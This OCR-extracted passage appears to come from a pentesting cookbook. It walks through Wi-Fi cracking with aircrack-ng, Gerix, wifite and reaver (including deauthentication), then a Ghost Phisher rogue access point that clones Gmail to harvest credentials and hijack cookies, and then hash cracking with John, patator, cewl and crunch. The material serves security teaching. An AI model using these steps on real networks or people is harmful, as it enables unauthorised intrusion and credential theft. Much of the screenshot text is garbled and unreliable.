8697 packets (got 113 ARP r ; and 2 
8825 packets (got 131 ARP reque flare! 
8960 packets (got 148 ARP r Flare! 
9079 packets (got 168 ARP and 3 
9196 packets (g 193 ARP reque fe] are| 
9307 packets 200 ARP _r stS_and 


nt 120 packets... 
170 packets... 
219 packets... 
270 packets... 
320 packets... 
370 packets... 
420 packets... 
469 packets... 
520 packets... 
packets... 
packets. . 
o¥A0) 


NuUNnNNW Oo 
NONnNNnNnNnNHNHW OWA OD O 
OO. O00 O2:5°9 3294 
Ses) Soe Sieh Pane ort 
et oct et ot oct ct 





9. Once we have enough packets, we Start aircrack-ng and provide the filename where we saved the 
packets: 


| aircrack-ng filename.cap 


The following screenshot shows an example of the preceding command: 


Aircrack-ng 1.2 rc3 


[00:00:20] Tested 1209601 keys (got 9983 IVs) 


fo[=Jehm al byte(vote) 

eye 2A(15616) 2E(14080) FC Sects 74(13312) EF(13312) 24(13056) 81(13056) pt =i=1 @ 421010) me 10] Gl 1010 ed 
O/ 1 66(15872) 31(14336) 93 94(14080) 1A(1 é 33 7 

ay ae g B9(1 

0/ 


> 


zs 

1 O 0 8B(1 

2  21(14592) Al 07 45(1 

8 Sepp : 6 2F(1 

a 6( B7(13312) 4E(13056) 77 D3(13056) 30( 
9 fs 00(12544) © 2 2D(12544) AD C2(12544) 02 g ( 7 
7F( 15360) 5A(14336) 6 25(13824) 2 5F (13056) ( 9 ) ‘F5f fs) o]o 76( 12868) 
CE(13568) 4E(13312) isle] @! as ]0)o1e) mm Dle) 6) 09(1280 5 73 a/ti25 4D(12544) 
LY} GR [0}o1o) m4 gal #421010) ao 10) 0(12 5D 6D(1 AAC 9(12 53 4(125 D6( 12544) 
9F (13568) 27(13312) 5 0 2 12( : 00) 82 0 } 6(12 A1(12544) 
C6(13824) 91(13568) 03(13312) 33 F9(13312) 17(130 A 056) 72 Ag rad 0745 10]0)) 


alk 
2 
3 
4 
5 
6 
7 
is} 
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10. Once cracked, we should see the password on screen: 


[90:00:00] 1 keys tested (1020.67 k/s) 
KEY FOUND! [ Ciscol23 ] 


C4 4B F3 33 
8B 1D E6 B9 


Transient Key : 86 F8 E5 41 EA 
3B FB 5E EO 
17 83 C6 OA 
IDL27 \CGNe2 


EAPOL HMAC : 69 36 3 46 07 46 
: /home# 





How it works... 


The idea behind this attack is to capture as many packets as possible. Each data packet contains an 
Initialization Vector (IV), which is 3 bytes in size and is associated with it. We simply capture as many 
IVs and then use Aircrack on them to get our password. 


Hands on with Gerlx 


In the previous recipe, you learned how to use the Aircrack suite to crack WEPs. In this recipe, we will 
use a GUI-based tool Gerix, which makes the Aircrack suite easy to use and makes our wireless network 
audit much easier. Gerix is a python-based tool built by J4r3tt. 


Getting ready 


Let's install Gerix using the following command: 


| git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git 


How to do it... 


The following steps demonstrate the use of Gerix: 


1. Once it's downloaded, we go to the directory where it's downloaded and run the following 
command: 


| cd gerix-wifi-cracker-2 
2. We run the tool using the following command: 
| python gerix.py 
The preceding commands can be seen in the following screenshot: 


cert 
# git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.g 


i 
Cloning into 'gerix-wifi-cracker-2'... 
remote: Counting objects: 48, done. 


remote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48 
Unpacking objects: 100% (48/48), done. 
Checking connectivity... done. 
: # cd gerix-wifi-cracker-2/ 
# python gerix.py 





3. Once the window opens, we click on Enable/Disable Monitor Mode in the Configuration tab as 
shown in the following screenshot: 


Gerix wifi cracker 2 oo 8 


Welcome | Configuration | WEP WPA Fake AP Cracking Database Credits 


Directory for session files (logs, .cap, ...): 





/root/.gerix-wifi-cracker/ | Clean old session files 





Select the interface: 


Interface MAC Chipset Driver Mode 
1 wlanOmon 00:cO:ca:57:... | Ralink Techn... | rt2800usb Monitor 





Reload wireless interfaces | | Set random MAC address | Enable/Disable Monitor Mode 





Select the target network: 


Essid Bssid Channel Signal Enc 





Channel: | all channels v | Seconds: ‘10 2 Rescan networks 


04:16:53 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 





4. Then, we click on Rescan networks: 





| Reload wireless interfaces | Set random MAC address | Enable/Disable Monitor Mode | 





Select the target network: 


ry 


Essid Bssid Channel Signal Enc 
1 Tenda_OE01... |C8:3A:35:0E.... | 7 -80 WPA CCMP ... | 
2 HCLMI B8:CL:A2:1A... |8 -80 WPA CCMP ... 
3 SDMANDIR | 54:B8:0A:95... | 1 -78 WPA2 CCMP... ¥ 


Channel: | all channels v| Seconds: | 10 i Rescan networks 





5. This will show us the list of access points available and the type of authentication they use. We 
select the one with WPA and then switch to the WPA tab. 
6. Here, we click on General functionalities and then we click on Start Capturing: 


Welcome Configuration WEP | WPA | Fake AP Cracking Database Credits 


Welcome in WPA Attacks Control Panel 
General functionalities 
Functionalities 


| Start Sniffing and Logging 





Tests 


| Performs a test of injection AP 





7. Since the WPA attack requires the handshake to be captured, we need a station to be already 


connected to the access point. So, we click on the Autoload victim clients or enter custom victim 
MAC: 


WPA handshake attack 
Add victim client MAC: 





94:53:30:68:2E:A2 


Autoload victim clients 





Add the deauth number: 
4 





Now you need to capture the HandShake, start the deauthentication. 





Client deauthentication 





8. Next, we choose the deauth number. We choose o here in order to perform the deauthentication attack 
and click on the Client deauthentication button: 


Welcome Configuration WEP | WPA Fake AP Cracking Database Credits 


Welcome in WPA Attacks Control Panel 


General functionalities 
WPA attacks 


WPA handshake attack 
Add victim client MAC: 


| v 


Autoload victim clients 
Add the deauth number: 


4 








Now you need to capture the HandShake, start the deauthentication. 


| Client deauthentication 





9. We should see a window pop up, which performs deauthentication for us: 


bash -c "aireplay-ng -O 0 -a 3C:1E:04:91: 


TB7C -c 94:53:3... 


+ [9425 +ho E: 


oo 8 
[ 0 AC 








5 
5 


tH moo ol 


And in the airodump window, we should see that the handshake has been captured. 


10. Now that we are ready to crack the WPA, we switch to the WEP cracking tab, and in the WPA 
bruteforce cracking, we give a path to our dictionary and click on Aircrack-ng - Crack WPA 
password: 


Welcome in Cracking Control Panel 
WEP cracking 


WPA bruteforce cracking 


Normal cracking 
Add you dictionary: 





froot 


Aircrack-ng - Crack WPA password 





Pyrit cracking 
(For use it you need to install pyrit support) 
Add you dictionary: 


Crack the password with pyrit 





11. We should see the Aircrack window, and it will show us the password when it has been cracked: 


EAPOL HMAC a1 ¢ : BE AE 





12. Similarly, this tool can be used to crack WEP/WPA2 networks as well. 


Dealing with WPAs 


Wifite is a Linux-only tool designed to automate the process of a wireless audit. It requires Aircrack 
suite, Reaver, Pyrit, and so on to be installed for it to be able to run properly. It comes preinstalled with 
Kali. In this recipe, you will learn how to use wifite to crack some WPAs. 


How to do it... 


To learn about Wifite follow the given steps: 


1. We can start Wifite by typing the following command: 


| wifite 


The preceding command shows up a list of all the available networks as shown in the following 
screenshot: 


[+] ), updates at 5 sec intervals, when ready. 


POWER WPS? CLIENT 


WPA2 
WPA 
WPA 
WPA2 2db 
WPA2 22db 
WPA2 18db 


wireless networks. targets and 3 clients found 





2. We then press Ctrl + C to stop; it will then ask you to choose the network we would want to try 
cracking: 


ale) 
ale) 
WPA2 
WPA2 ni) 
WPA Odk no 
WPA2 t no 
(60:0D2:B5:35:CD:Al) 18db ale) 


[+] select ) separated by commas, or 





3. We enter our number and press Enter. The tool automatically tries to use a different method to crack 
the network, and in the end, it will show us the password if it was successfully cracked: 
aT) 
no 
ho 
(0C:D2:B5:35:CD:A1) 1 no 
[+] select { ) separated by commas, or ' 
[+] target selected. 


] starting 
| found: 





] 
[0:07:55] listening for handshake... 


We will see the following password: 


[+] starting 
MCHACICACIOR on w-lel.@iare! 
keys tes 


[+] disabling monitor mode on 
[+] quitting 





Owning employee accounts with Ghost Phisher 


Ghost Phisher is a wireless network audit and attack software that creates a fake access point of a 
network, which fools a victim to connect to it. It then assigns an IP address to the victim. The tool can be 
used to perform various attacks, such as credentials phish and session hijacking. It can also be used to 
deliver meterpreter payloads to the victims. In this recipe, you will learn how to use the tool to perform 
various phishing attacks or steal cookies, among others. 


How to do it... 


The use of Ghost Phisher can be seen as follows: 


1. We start it using the ghost-phisher Command: 


Ghost Phisher 


Fake Access Point || Fake DNS Server Fake DHCP Server Fake HTTP Server GHOSTTrap Session Hijacking = ARP Cache Poisoning Harvested Credentials © About 


Access Point Details 


Acess Point Name: ‘Channel: P address: Mac Address: 


Runtime: 


Wireless Interface 








Vv | | Refresh Card List 
‘Current Interface: Mac Address: Driver: Monitor: 
s Poi 
raph 
Status 
2. Here, we choose our interface and click on Set Monitor: 
Wireless Interface 
wland ¥| | Refresh Card List 





Current Interface: phy) Mac Address: O0:cO:ca:57:cd:fd Driver: rt2800usb Monitor: Not Started 


Set Monitor 





click to place wirless 


card an minniter 


3. Now we enter the details of the access point we want to create: 





coir = Cryptography 


Status 


08:19:54 Created tap interface at0 

08:19:54 Trying to set MTU on atO to 1500 

08:19:54 Trying to set MTU on wlanOmon to 1800 

08:19:55 Access Point with BSSID 00:C0:CA:57:CD:FD started. 


Connections: 


4. Then, we click on Start to create a new wireless network with that name. 


5. Then, we switch to a Fake DNS Server. Here, we need to mention the IP address the victim will be 


directed to whenever he/she opens any web page: 


Fake Access Point | Fake DNS Server | Fake DHCP Server | Fake HTTP Server GHOSTTrap Session 


DNS Interface Settings 





atO ¥ 





Current Interface: atO 


UDP DNS Part: 53 


Query Responce Settings 


® Resolve all queries to the following address (The currently selected IP address is recommended) 





192,168.12 
C) Respond with Fake address only to the following website domains 


Address: | Webs 





6. We then start the DNS server. 
7. Then, we switch to Fake DHCP Server. Here, we need to make sure that when a victim tries to 
connect, he/she gets an IP address assigned to him/her: 


= 


DHCP Version Information 
‘Ghost DHCP Server 
Default Port: 67 


Protocol: UDP (User Datagram Protocol) 




















DHCP Settings 
Start: |192.168.1.1 End: {192.168.1255 
Subnet mask: | 255.255.255.0 Gateway: | 192.168.0.1 
— Pr | ocuees PPE 
Fake DNS: (| 192.168.1.2 AILDNS: |192.168.1.2 
Status 


Started Ghost DHCP Server at Mon Mar 13 08:24:10 2017 


android-cc3F23457a889e62 has been leased 192,168.12 


Once this is done, we click on Start to start the DHCP service. 


If we want to phish someone and capture credentials, we can direct them to our phishing page by 
setting the options in the Fake HTTP Server tab. Here, we can upload the HTML page we want to be 
displayed or provide a URL we would want it to clone. We start the server: 


Fake Access Point Fake DNS Server Fake DHCP Server | Fake HTTP Server | GHOST Trap Session Hijacking = ARP Cache Poisoning Harvested Credentials © About 


HTTP Interface Settings 








atO ¥ 192.168.0.1 
Current Interface: atO Service runnil 
TCP Port: 80 Protocol: HTTP (Hypertex! 
Webpage Settings 





® Clone Website: | https-//gmailcom 





©) Select Webpage: | | | 
Real Website IP Address or Url: | https://Wwww.gmailcom | {] Run Webpage on Port: | ( Default HTTP 


Service Mode 
® Credential Capture Mode a Hosting Mode 


Status 


Starting HTTP Server... 
Successfully cloned https://gmaiLcom 


captured credentials: 


Please refer to the Harvested Credential Tab to vew captured credentials 


| Start 


10. In the next tab, we see Ghost Trap; this feature allows us to perform a Metasploit payload attack, 
which will ask the victim to download our prepared meterpreter payload, and as soon as it is 
executed, we will get a meterpreter connection back. 

11. Inthe Session Hijacking tab, we can listen and capture sessions that might go through the network. 
All we need to do here is enter the IP address of the gateway or router and click on Start, and it will 
detect and show any cookies/sessions captured: 


FTacrwr 


Fake Access Point FakeDNSServer Fake DHCP Server FakeHTTP Server GHOSTTrap | Session Hijacking | ARP Cache Poisoning Harvested Credentials About 








Fern Cookie Hijacker is an Ethernet and WIFI based session Hijacking tool able to clone remote online web sessions by sniffing and capturing session cookie packets from remote hosts by leveraging various 
internal MITM attacks with routing capabilities 





wiand v Refresh 


@ Ethernet Mode ©@ Sniffing Status @ Cookie Detection Buffer 
Internal MITM Engine Activated 


@ Ethernet Mode © Passive Mode 


Gateway IP Address / Router IP Address: 





—s =o 





12. The credentials we captured in the HTTP server can be seen in the Harvested Credentials tab. 


Pixie dust attack 


Wi-Fi Protected Setup (WPS) was introduced in 2006 for home users who wanted to connect to their 
home network without the trouble of remembering complex passwords for the Wi-Fi. It used an eight digit 
pin to authenticate a client to the network. 

A pixie dust attack is a way of brute forcing the eight digit pin. This attack allowed the recovery of the pin 
within minutes if the router was vulnerable. On the other hand, a simple brute force would have taken 
hours. In this recipe, you will learn how to perform a pixie dust attack. 


This list of vulnerable routers on which the attack will work can be found at https://docs. google.com/spreadsheets/d/ 
1tSlbqV Q59kGn8hgmwcPTHUECQ309YhXR91A_p7Nnj5Y/edit? pref=2&pli=1# gid=2048815923. 


Getting ready 


We need the network with WPS enabled. Otherwise, it will not work. 


How to do it... 


To learn about pixie dust follow the given steps: 
1. We start our interface in the monitor mode using the following command: 
| airmon-ng start wlanod 
2. Then, we need to find the networks with WPS enabled; we can do that using the following command: 
| wash -i <monitor mode interface> -C 
The following screenshot shows an example of the preceding command: 


:~/Desktop# wash -i wlanOmon -C 


Wash v1.5.2 WiFi Protected Setup Scan Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> 
mod by t6 x <t6 x@hotmail.com> & DataHead & Soxrok2212 


Channel WPS Version WPS Locked 


Akshay f.f 
TP-LINK EF1A 


ry 


the simpsons 
Maximum 


Oreownoqn hy 
ee 
La» Bi <> el <> 2 <> Bl xe <> <> 2 <>) 


ry 





3. Now we run reaver using the following command: 


| reaver -i wlanOmon -b [BSSID] -vv -S -c [AP channel] 


The following screenshot shows an example of the preceding command: 


:~/Desktop# reaver -i wlan@mon -b A4:2B:BO0:AD:EF:1A -vv -S -c 6 


Reaver v1.5.2 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol. com> 
by t6 x <t6 x@hotmail.com> & DataHead & Soxrok2212 


Switching wlanOmon to channel 6 

Waiting for beacon from A4:2B:B0:AD:EF:1A 

Associated with A4:2B:B0:AD:EF:1A (ESSID: TP-LINK EF1A) 

Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking 





4. Once it's done, we should see the PIN. 


There's more... 


Here are some great articles which can be referred to while attacking wireless networks: 


® =http://www.hackingtutorials.org/wifi-hacking-tutorials/pixie-dust-attack-wps-in-kali-linux-with-reaver/ 
© http://www. kalitutorials.net/2014/04/hack-wpawpa2-wps-reaver- kali-linux.html 


Password Attacks — The Fault in Their Stars 


In this chapter, we will cover the following recipes: 


Identifying different types of hash in the wild! 
Using hash-identifier 

Cracking with patator 

Cracking hashes online 

Playing with John the ripper 

Johnny Bravo! 

Using cewl 

Generating word list with crunch 


Introduction 


A weak password is a well-known scenario where most of the corporates are compromised. A lot of 
people use weak passwords that can be brute forced and plaintext can be obtained. In this chapter, we 
will talk about different ways in which we can crack a password hash obtained during a pentest activity 
performed on a webapp/network, among others. 


Identifying different types of hash in the wild! 


Hashes are generated by one-way mathematical algorithms, which means they cannot be reversed. The 
only way to break is to brute force them. In this recipe, you will learn how to identify some of the 
different types of hashes. 


How to do it... 


Following are the types of hashes. 


MD5 


This is the most common type of hash. MD stands for Message Digest algorithm. These hashes can be 
identified using the following observation: 


e They are hexadecimal 
e They are 32 characters in length and of 128 bits, for example, 21232F297a57a5a743894a0e4a801fc3 


MySQL less than v4.1 


We may come across such hashes while extracting data from SQL Injection. These hashes can be 
identified using the following observation: 


e They are hexadecimal as well 
e They are 16 characters in length of and 64 bits, for example, 606727496645bcba 


MD5 (WordPress) 


This is used on websites made via WordPress. These hashes can be identified using the following 
observation: 


e They begin with gps 
e They contain alphanumeric characters 
e They are 34 characters in length and of 64 bits, for example, spsoqcusro7ob2qnmbmscRh3mMoi6ehJZR 


MySQL 5 


This is used in newer versions of MySQL to store credentials. These hashes can be identified using the 
following observation: 


e They are all CAPS 
e They always start with an asterisk 
e They are 41 characters in length, for example, *4acres202a5FF5CF467898FC58AAB1D615029441 


Base64 encoding 


Base64 is easy to identify. The conversion is done by encoding eight octets into four characters. The 
easiest way to check a Base64 is as follows: 


e Verify that the length is a multiple of 4 characters 
e Verify that every character is in the set A-Z, a-z, 0-9, +, / except the padding at the end, which is 0, 1, 
or 2, = characters, for example, ywss1enhcmshbcBwhGvhesvyzs4= 


There's more... 


Here's an article to learn more about different types of hashes: 


http://www. 101hacker.com/2010/12/hashes-and-seeds-know-basics. html 


Using hash-identifier 


In the preceding recipe, you learned how to identify some common hash types. But there are other hashes 
as well, and in this recipe, you will learn how to identify other hashes we find during our pentesting 
project. 


How to do it... 


The following steps demonstrate the use of hash-identifier: 


1. Kali comes preinstalled with a tool called hash identifier. To start the tool, we use the following 
command: 


| hash- identifier 


The following screenshot shows the output of the preceding command: 


:~# hash-identifier 
HHHHHHHHHRHRHHHHHHAERHRHAHEAEHEBHBHPHEAREBEBEBRP BEBE EB EPR RE BEBE B EPR 


n3R # 

la oit.com # 

oot@Blackploit.com # 
HHAHHBHHHHHHAHAHHHHHAHABHHHHAAHAHHRHRHRARHEBERHPEPRE PERE REP REE REP ERH 





2. Now all we need to do is paste the hash we found here, and it will show us the type: 
root@kali: ~ 


Found. 


HASH: DO33E22AE348AEB5660FC2140AEC35850C4DA997 


- SHA-1(SHA-1($pass) ) 


Possible Hashs: 
Tiger-160 
Haval - 160 
RipeMD- 160 
SHA-1(HMAC) 





Cracking with patator 


Sometimes, it is possible we have the usernames but we want to try brute forcing the password for it. 
Patator is an amazing tool that allows us to brute force multiple types of logins and even ZIP passwords. 
In this recipe, we will see how to use patator to perform a brute force attack. 


How to do it... 


Following are the steps to use patator: 


1. To see all the options, we use the following command: 
| patator -h 
The following screenshot shows the output of the preceding command: 


:~# patator -h 
Patator v0.5 (http://code.google.com/p/patator/) 
Usage: patator.py module --help 


Available modules: 

+ ftp_login : Brute-force FIP 
ssh_login : Brute-force SSH 
telnet_login : Brute-force Telnet 
smtp_login : Brute-force SMTP 


smtp_vrfy : Enumerate valid users using SMTP VRB 
smtp_rcpt : Enumerate valid users using SMTP RCH 
finger_lookup : Enumerate valid users using Finger 
http_ fuzz : Brute-force HTTP 

pop_login : Brute-force POP3 

ele) of el~l=s-10| : Brute-force poppassd (http://netwin 
imap_login : Brute-force IMAP4 

iWe[-| oem Melenna : Brute-force LDAP 

smb_ login : Brute-force SMB 

smb _lookupsid : Brute-force SMB SID-lookup 





t+ +e teeteet eet 


2. Let's try to brute force an FTP login: 


| patator ftp_login 


The following screenshot shows the output of the preceding command: 


:~-# patator ftp_login 
Patator v0.5 (http://code.google.com/p/patator/) 
Usage: ftp_login <module-options ...> [global-options ... 


Examples: 
ftp_login host=10.0.0.1 user=FILEO password=FILE1 O=logins.txt 1l=passwor 
-x ignore:mesg='Login incorrect.’ -x ignore, reset, retry:code=500 


Module options: 
host : target host 
port : target port [21] 
user : usernames to test 


password : passwords to test 

tls : use TLS [0|1] 

timeout : seconds to wait for a response [10] 
persistent : use persistent connections [1]|0] 





3. We can now set the host, user file, and password file and run the module: 


| patator ftp_login host=192.168.36.16 user=ftp password=ftp 


The following screenshot shows the output of the preceding command: 


:~-# patator ftp login host=192.168.36.16 user=ftp password=ftp 
Starting Patator v0.5 (http://code.google.com/p/f 


patator 
patator 
patator 
patator 
patator 


INFO 
INFO 
INFO 
INFO 
INFO 
INFO 





patator 


4. We can see that access has been granted and the module has stopped. 


Cracking hashes online 


Often when we come across hashes while pentesting, it's a good idea to check the hash online: whether it 
has been already cracked or not. In this recipe, you will learn about some of the cool websites that 
provide the hash cracking service. 


How to do it... 


Let's take a look at identifying different types of hashes. 


Hashkiller 


The following steps demonstrate the use of Hashkiller: 


1. Hashkiller is a great service where we can submit our hashes, and if it has already been cracked in 
the past, it will show us the plaintext: 


@ Secure https://hashkiller.co.uk 


CNEVIREDE PASSWORDS ORUSERS! 


Home Forums Decrypter/Cracker Databaseinfo HashMinMax # WPACrack Lists and Competition 


HashKiller’s purpose is to serve as a meeting place for computer hobbyists, security researchers and penetration teste 
demonstrating the weakness of using hash based storage / authentication. 


Last 50 successful MD5 decryptions / founds 


# Type 
5 MySQL4.1/MySQL5 
MySQL4.1/MySQL5 
MySQL4.1/MySQL5 
MySQL4.1/MySQL5 
MySQL4.1/MySQL5 
MySQL4.1/MySQL5 





2. The process is simple; we simply choose the option on the website where it says Decrypter / 
Cracker and then we click on the type of hash we want to crack: 


MD5 Decrypter 
NTLM Decrypter 


SHA1 Decrypter 
Submit Founds 





3. On the page that opens, we paste our hash, fill in the CAPTCHA, and then click on Submit: 


https://hashkiller.co.uk/md5-decrypter.aspx 


he MDS hashes that you would like to be converted into text / cracked / decrypted. NOTE that spa 


lhe password Is after the : character, and the MD5 hash is before it. 


SF853DB812ES9FPD3FF64C7AD 





4. Ifthe hash exists, it will show us the plaintext; else, we will see a message saying Failed to find any 
hashes!: 


https://hashkiller.co.uk/md5-decrypter.aspx 
he MDS5 hashes that you would like to be converted into text / cracked / decrypte 


lhe password is after the : character, and the MD5 hash is before it. 





Crackstation 


Crackstation is a free service that supports MD2, MD5, NTLM, and SHA1 cracking. It uses its own word 
list and lookup tables to effectively perform a plaintext search of a hash from its database: 


1. We visit the website https:/crackstation.net/: 


f@ Secure https://crackstation.net 





CrackStation ¥ Password Hashing Security ¥ Defuse Security yv 


Free Password Hash Crac! 





Enter up to 20 non-salted hashes, one per line: 














Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, shai, sha224, sha256, sha384, sha5i2, ripeMI 
QubesV3,1BackupDefaults 


Download CrackStation's W 


2. We paste the hash that we want to crack and fill in the CAPTCHA: 


Enter up to 20 non-salted hashes, one per line: 


70F63D696B87AD024E2062F710599A97 


¢ 
mege SIMPSON ‘i (reciere 
0 





Crack Hasnes 





Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, shai, sha224, sha256, sha384, sha5i2, ripeMD160, whirlpool, MySQL 4.1+ (shal(shai_bin)), 
QubesV3, 1BackupDefaults 


3. We will see the plaintext if the hash is found; else, we see a message that says the hash was not 
found: 


Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, shai, sha224, sha256, sha384, sha5i2, ripeMD160, whirlpool, MySQL 4.1+ (shai(sha1_bin)), 
QubesV3.1BackupDefaults 


Hash Type Result 


Color Codes: Green: Exact match, Yellow: Partial match, [J Not found. 


4. Crackstation also provides a download link of its password list and lookup tables if we want to use 


it for the offline cracking of passwords using hashcat, among others, https:/crackstation.net/buy-crackstation-wo 
rdlist-password-cracking-dictionary. htm: 


https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


8 ————E—E—E—E—E—E—E— 


Note: To download the torrents, you will need a torrent client like Transmission (for Linux and Mac), or uTorrent fc 


Torrent (Fast) 


GZIP-compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 


HTTP Mirror (Slow) 


Checksums (crackstation.txt.gz) 


MD5: 4748a72706££934a17662446862ca4fB 
SHA1: efa3fSecbfba03df£523418a70871ec59757b6d3f 
SHA256: a6dc17d27d0a34f£57c98974 1lacdd485b8aee45a6e97 96daf8C9435370dc61612 


Smaller Wordlist (Human Passwords Only) 


I got some requests for a wordlist with just the "real human" passwords leaked from various website databases. Tt 
passwords. There are about 64 million passwords in this list! 


Torrent (Fast) 


GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 


HTTP Mirror (Slow) 


OnlineHashCrack 


This is a freemium service and one of my favorites. It supports OSX, MD4, MD5, NTLM, WPA(2), and 
the brute forcing of Word, Excel, PPT-protected documents as well. It provides up to eight characters 
password-free, after which it charges a small fee to reveal the password, which has been cracked 
successfully: 


1. We visit the website httpy/onlinehashcrack.com/: 


https://www.onlinehashcrack.com 





nline Hashcrack HASHES WIFI Office 


‘rofessional Password Recovery 


ONLINE HASH CRACK IS A PASSWORD RECO\ 
ASSISTING PENTESTERS & SECURITY EXPERT 


2. Here, we can submit our hashes or the .apt file for cracking and the email address where we want to 
receive our notification: 


Password/ Hashes crack Wifi WPA(2) crack 


ENTER YOUR HASHES (UP TO 10): UPLOAD YOUR CAPTURE FILE: 


Choose file No file chosen 


Q “cap or “pcap or “hccap 
9 Maxsize:10Mb 
9 Automatically select the first ESSID 


Hash acceptance list. 
EMAIL: 


EMAIL: 


SUBMIT 
SUBMIT 


3. On the unique link we receive in our email, we can then see the status of all the hashes that were 
cracked or not found on the website: 





52 





2016-01- 00D3CE11561C36889060663B629F8D34 
13 


2015-11- — $P$Bn/FWwVncpeJ9R3MMAIOFWfUDRLVTB 
23 a. 








HASHES 


WIFI OFFICE HOW TO? Al 








Playing with John the ripper 


Websites and online services may not be always available and it is also possible that those websites may 
not have the plaintext of the hash we have found. In such cases, we can use different offline tools that are 
available to crack the hashes. 


Let's assume we now have the hash and we have identified what type it is. In this recipe, we will see how 
to crack hashes with John the ripper. John is fast and supports various cracking modes. It also has the 
ability to auto-detect the hash type. 


How to do it... 


to learn about John the ripper, follow the given steps: 


1. We can see the full features using the help (-n) command: 
| john -h 
The following screenshot shows the output of the preceding command: 


t~# john - 
John the Ripper p 
Copyright (c) é 
Homepage: htt 


rd cracker, version 1.8.0.6-jumbo-1-bleeding_ omp [linux-< 
Signer and others 


[PASSWORD -FILES] 
"single crack" mode 
--stdin wordlist mode, read words from FILE or stdin 
--pipe like --stdin, but bulk reads, and allows rules 
-- Loopback [=FILE] like - rdlist, but fetch words from a .pot file 
- -dupe-supp sion supp all dupes in wordlist (and for preload) 
- -encoding= le glefele hare} g. UTF-8, ISO-8859-1). See also 
JING and --list=hidden-options. 
to) ON IO) \\ = = rd mangling r > r wordlist modes 
--incremental [=MODE] "incre tal" mode 
- -mask=MASK using M 
--markov[=OPTIONS] "Markov" mode ( 
ernal=MODE ernal mode or word filt 
out [=LENGTH] output candidate p rds [cut at LENGTH] 
( ore an interrupted [called NAME] 





2. To crack the password, we use the following command: 


john --format=raw-md5 
--wordlist=/usr/share/wordlists/rockyou.txt /root/demo_hash. txt 


3. We will see that the password has been cracked successfully! 


:~# john -- format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt /root 


Using default input encoding: UTF-8 
Loaded 1 password hash (Raw-MD5 [MD5 32/32]) 
‘gq’ or Ctrl-C to abort, almost any other key for status 
(?) 
1g 0:00:00:00 DONE (2017-02-20 01:29) 8.333g/s 165158p/s 165158c/s 
se the "--show" option to display all of the cracked passwords r 





ession completed 


There's more... 


For more information you can refer to the following articles: 


© http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats 


Johnny Bravo! 


Johnny is a GUI client for John. Since it adds a UI, it becomes much easier to use. 


How to do it... 


To learn about Johnny follow the given steps: 


1. You have learned to use John in our previous recipe. We will start Johnny using the following 
command: 


| johnny 


The following screenshot shows the output of the preceding command: 


Johnny 
File Attack Passwords 


r y y oe 
Open Passwd File Copy 


Passwords 


Options 


Statistics 


X% 


Settings 


Output 


2. We load our password file by clicking on the Open Passwd File option. Our file is loaded: 


User Password Hash GECOS 
21232f297... 


3. Now we go to Options and choose the type of attack we want to perform: 


Default behaviour 

"Single crack" mode 
+) Wordlist mode 

“Incremental” mode 


External mode 


i ae 
Default behaviour "Single crack" mode | Wordlist mode | "Incremental" mode | External mode 


Wordlist mode uses data from wordlist file. As an addition rules could be applied. Section "Wordlist" would be used to mangle words 
with rules 


Wordlist file: /usr/share/wordlists/rockyou.txt ¥ Browse 
Use rules 


Use external mode, filter name: 


4. We choose the Format of the hash: 


General options 
Format: md5 
Mode selection and settings 


| Default hehavioir 


5. Once it is done, we click on Start Attack, and we should see our password when it's cracked. 


Using cewl 


The cew1 is a ruby-based crawler that crawls a URL and searches for words that can be used for password 
attacks. In this recipe we will look at how to use it to our advantage. 


How to do it... 


Following are the steps on using cew1: 


1. To view all the options of cew1, we use this command: 


| cewl -h 


The following screenshot shows the output of the preceding command: 


:~# cewl -h 
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja) 


Usage: cewl [OPTION] ... URL 
--help, -h: show help 
--keep, -k: keep the downloaded file 
--depth x, -d x: depth to spider to, default 2 
--min_word_ length, -m: minimum word length, default 3 
--offsite, -o: let the spider visit other sites 
--write, -w file: write the output to the file 
--ua, -U user-agent: useragent to send 
--no-words, -n: don't output the wordlist 
--meta, -a include meta data 
--meta_file file: output file for meta data 
--email, -e include email addresses 
--email_file file: output file for email addresses 
--meta-temp-dir directory: the temporary directory used by exiftool when pa 
--count, -c: show the count for each word found 





2. To crawl a website, we use this command: 


| cewl -d 2 http://192.168.36.16/forum/ 
The following screenshot shows the output of the preceding command: 


:~# cewl -d 2 http://192.168.36.16/forum/ 
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja) 





3. We will see a list of interesting keywords that can be used to make our own dictionary the password 
list: 


Sle) 





Generating word list with crunch 


Crunch is a word list generator. It uses permutations and combinations to generate all possible 
combinations of the supplied character set. 


How to do it... 


To learn about Crunch follow the given steps: 


1. Crunch is preinstalled with Kali, and we can launch it with this command: 
| crunch -h 


:~# crunch -h 
crunch version 3.6 


Crunch can create a wordlist based on criteria you specify. The output 


e: crunch <min> <max> [options] 
re min and max are numbers 





r to the man page for instructions and examples on how to us¢ 


2. As we see, it is easy to use to generate a password list of a minimum of two characters and 
maximum of two characters containing only abcdef, and we can use the following command: 


| crunch 2 2 abcdef 


We can see that the word list has been generated: 


:~# crunch 2 2 abcdef 
Crunch will now generate the following amount of data: 108 bytes 
0 MB 
© GB 
0 TB 
Q PB 





3. To save it ina file, we can use the -o switch. Crunch also has an inbuilt list containing a predefined 
character set. It can be found at /usr/share/crunch/charset . 1st. 


4. To use a charset, we use the -¢ switch: 


| crunch 2 2 -f /usr/share/crunch/charset.1st lalpha 


The following screenshot shows the output of the preceding command: 


: Edit Search Options Help 
